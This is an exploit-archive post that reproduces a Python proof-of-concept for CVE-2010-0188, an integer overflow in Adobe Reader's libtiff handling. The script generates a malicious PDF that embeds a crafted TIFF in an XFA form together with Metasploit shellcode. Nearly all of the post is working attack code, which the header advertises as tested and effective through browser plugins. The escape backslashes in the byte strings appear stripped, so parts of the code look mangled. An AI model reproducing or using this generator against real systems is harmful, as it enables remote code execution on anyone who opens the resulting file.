Home / os / winme

Adobe Acrobat libtiff Remote Code Execution Vulnerability

Posted on 13 March 2010

=========================================================
Adobe Acrobat libtiff Remote Code Execution Vulnerability
=========================================================

# Exploit Title: Adobe Acrobat libtiff Remote Code Execution
# Author: villy ( http://bugix-security.blogspot.com/)
# Software Link: http://adobe.com/
# Version: Adobe Reader 9.x < 9.3.1
# Tested on: windows xp(sp2 and xp3)
# CVE : CVE-2010-0188
# Code : attachment CVE-2010-0188.py

Description : Adobe Acrobat libtiff windows Remote Code Execution
Exploit(CVE-2010-0188).pdf


CVE-2010-0188 Adobe Working Exploit
Exploits works with Adobe js disabled.
Tested : successfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3 any languages), also works with browsers adobe plugin !
Pdf file size ~2.3Kb.(removed unneeded shit and added FlateDecode)

------------------------------------------------------------------------------------------
__doc__='''

Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO

SHELLCODE_OFFSET=1500
TIFF_OFSET=0x2038

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf = "x2bxc9xd9xc0xd9x74x24xf4x5exb1x33xbaxd9xb4"
buf += "x0axbex31x56x15x03x56x15x83x1fxb0xe8x4bx63"
buf += "x51x65xb3x9bxa2x16x3dx7ex93x04x59x0bx86x98"
buf += "x29x59x2bx52x7fx49xb8x16xa8x7ex09x9cx8exb1"
buf += "x8ax10x0fx1dx48x32xf3x5fx9dx94xcax90xd0xd5"
buf += "x0bxccx1bx87xc4x9bx8ex38x60xd9x12x38xa6x56"
buf += "x2ax42xc3xa8xdfxf8xcaxf8x70x76x84xe0xfbxd0"
buf += "x35x11x2fx03x09x58x44xf0xf9x5bx8cxc8x02x6a"
buf += "xf0x87x3cx43xfdxd6x79x63x1exadx71x90xa3xb6"
buf += "x41xebx7fx32x54x4bx0bxe4xbcx6axd8x73x36x60"
buf += "x95xf0x10x64x28xd4x2ax90xa1xdbxfcx11xf1xff"
buf += "xd8x7axa1x9ex79x26x04x9ex9ax8exf9x3axd0x3c"
buf += "xedx3dxbbx2axf0xccxc1x13xf2xcexc9x33x9bxff"
buf += "x42xdcxdcxffx80x99x13x4ax88x8bxbbx13x58x8e"
buf += "xa1xa3xb6xccxdfx27x33xacx1bx37x36xa9x60xff"
buf += "xaaxc3xf9x6axcdx70xf9xbexaex17x69x22x1fxb2"
buf += "x09xc1x5fx00"

class CVE20100188Exploit:
	def __init__(self,shellcode):
		self.shellcode = shellcode
		self.tiff64=base64.b64encode(self.gen_tiff())

	def gen_tiff(self):
		tiff =  'x49x49x2ax00'
		tiff += struct.pack("<L", TIFF_OFSET)

		tiff += 'x90' * (SHELLCODE_OFFSET)
		tiff += self.shellcode
		tiff += 'x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)

		tiff += "x07x00x00x01x03x00x01x00"
		tiff += "x00x00x30x20x00x00x01x01x03x00x01x00x00x00x01x00"
		tiff += "x00x00x03x01x03x00x01x00x00x00x01x00x00x00x06x01"
		tiff += "x03x00x01x00x00x00x01x00x00x00x11x01x04x00x01x00"
		tiff += "x00x00x08x00x00x00x17x01x04x00x01x00x00x00x30x20"
		tiff += "x00x00x50x01x03x00xCCx00x00x00x92x20x00x00x00x00"
		tiff += "x00x00x00x0Cx0Cx08x24x01x01x00xF7x72x00x07x04x01"
		tiff += "x01x00xBBx15x00x07x00x10x00x00x4Dx15x00x07xBBx15"
		tiff += "x00x07x00x03xFEx7FxB2x7Fx00x07xBBx15x00x07x11x00"
		tiff += "x01x00xACxA8x00x07xBBx15x00x07x00x01x01x00xACxA8"
		tiff += "x00x07xF7x72x00x07x11x00x01x00xE2x52x00x07x54x5C"
		tiff += "x00x07xFFxFFxFFxFFx00x01x01x00x00x00x00x00x04x01"
		tiff += "x01x00x00x10x00x00x40x00x00x00x31xD7x00x07xBBx15"
		tiff += "x00x07x5Ax52x6Ax02x4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07x58xCDx2Ex3Cx4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07x05x5Ax74xF4x4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xB8x49x49x2Ax4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07x00x8BxFAxAFx4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07x75xEAx87xFEx4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xEBx0Ax5FxB9x4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xE0x03x00x00x4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xF3xA5xEBx09x4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xE8xF1xFFxFFx4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xFFx90x90x90x4Dx15x00x07x22xA7x00x07xBBx15"
		tiff += "x00x07xFFxFFxFFx90x4Dx15x00x07x31xD7x00x07x2Fx11"
		tiff += "x00x07"
		return tiff
	

	def gen_xml(self):
		xml= '''<?xml version="1.0" encoding="UTF-8" ?> 
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version> 
<interactive>1</interactive> 
<linearized>1</linearized> 
</pdf>
<xdp>
<packets>*</packets> 
</xdp>
<destination>pdf</destination> 
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" /> 
<medium short="612pt" long="792pt" stock="custom" /> 
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" /> 
<bind match="none" /> 
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit /> 
</ui>
</field>
<?templateDesigner expand 1?> 
</subform>
<?templateDesigner expand 1?> 
</subform>
<?templateDesigner FormTargetVersion 24?> 
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> 
<?templateDesigner Zoom 94?> 
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1> 
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" /> 
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" /> 
<subform name="Page1">
<field name="ImageField1" /> 
</subform>
<pageSet>
<pageArea name="PageArea1" /> 
</pageSet>
</subform>
</form>
</xdp:xdp>

'''
		return xml

	def gen_pdf(self):
		xml = zlib.compress(self.gen_xml())
		pdf='''%PDF-1.6
1 0 obj 
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream 
endobj 
2 0 obj 
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj 
3 0 obj 
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj 
4 0 obj 
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj 
5 0 obj 
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj 
6 0 obj 
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj 
7 0 obj 
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj 
8 0 obj 
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
		return pdf


if __name__=="__main__":
	print __doc__
	if len(sys.argv) != 2:
		print "Usage: %s [output.pdf]" % sys.argv[0]

	print "Creating Exploit to %s
"% sys.argv[1]
	exploit=CVE20100188Exploit(buf)
	f = open(sys.argv[1],mode='wb')
	f.write(exploit.gen_pdf())
	f.close()
	print "[+] done !"



# ~  - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :

Exploits :